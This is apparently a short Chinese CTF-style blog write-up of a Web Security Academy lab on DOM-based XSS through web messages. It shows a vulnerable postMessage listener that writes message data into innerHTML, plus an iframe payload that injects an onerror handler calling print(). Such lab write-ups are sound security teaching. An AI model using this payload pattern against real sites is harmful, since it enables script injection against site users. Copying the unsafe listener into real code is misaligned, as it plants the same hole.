CTF-WEB: 利用Web消息造成DOM XSS

A5rZ2025-02-16 13:45

如果索引中有类似如下代码

js 复制代码 
<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
    window.addEventListener('message', function(e) {
        document.getElementById('ads').innerHTML = e.data;
    });
</script>
  • 这行代码的作用是将接收到的消息内容(e.data)设置为 id'ads' 的元素的 HTML 内容

那么在受害者段执行如下代码会导致DOM污染

html 复制代码 
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

参考

实验:使用 Web 消息的 DOM XSS |网络安全学院

相关推荐
火绒终端安全管理系统8 小时前
火绒终端安全管理系统V2.0【系统防御功能】
网络·安全·网络安全·火绒安全·火绒
H轨迹H8 小时前
BUUCTF-Web方向16-20wp
网络安全·渗透测试·ctf·buuctf
D-river9 小时前
【如何基于Debian构建Kali Linux】
linux·网络·安全·网络安全
donglxd11 小时前
防御黑客系列-第一集-电脑登录记录提示和登录远程推送
windows·网络安全·电脑·系统安全
摸鱼也很难11 小时前
js安全开发值&dom&bom&xss重定向&安全实例
javascript·xss·idm·dom型xss
爱编程的小庄16 小时前
web网络安全:跨站脚本攻击(XSS)
前端·web安全·xss
温柔小胖1 天前
sql注入之python脚本进行时间盲注和布尔盲注
数据库·sql·网络安全
网络安全筑盾者-燕子1 天前
计算机网络-OSI七层参考模型与数据封装,网络安全零基础入门到精通实战教程!
网络·计算机网络·安全·web安全·网络安全·osi
hvinsion1 天前
深入解析TLS协议:保障网络通信安全的关键技术
网络协议·安全·网络安全
网安Ruler1 天前
泷羽Sec-黑客基础之html(超文本标记语言)
前端·学习·网络安全·html
热门推荐
01本地部署DeepSeek教程(Mac版本)02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04DeepSeek各版本说明与优缺点分析05本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程06DeepSeek r1本地安装全指南07太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具09在Windows下安装Ollama并体验DeepSeek r1大模型10Page Assist - 本地Deepseek模型 Web UI 的安装和使用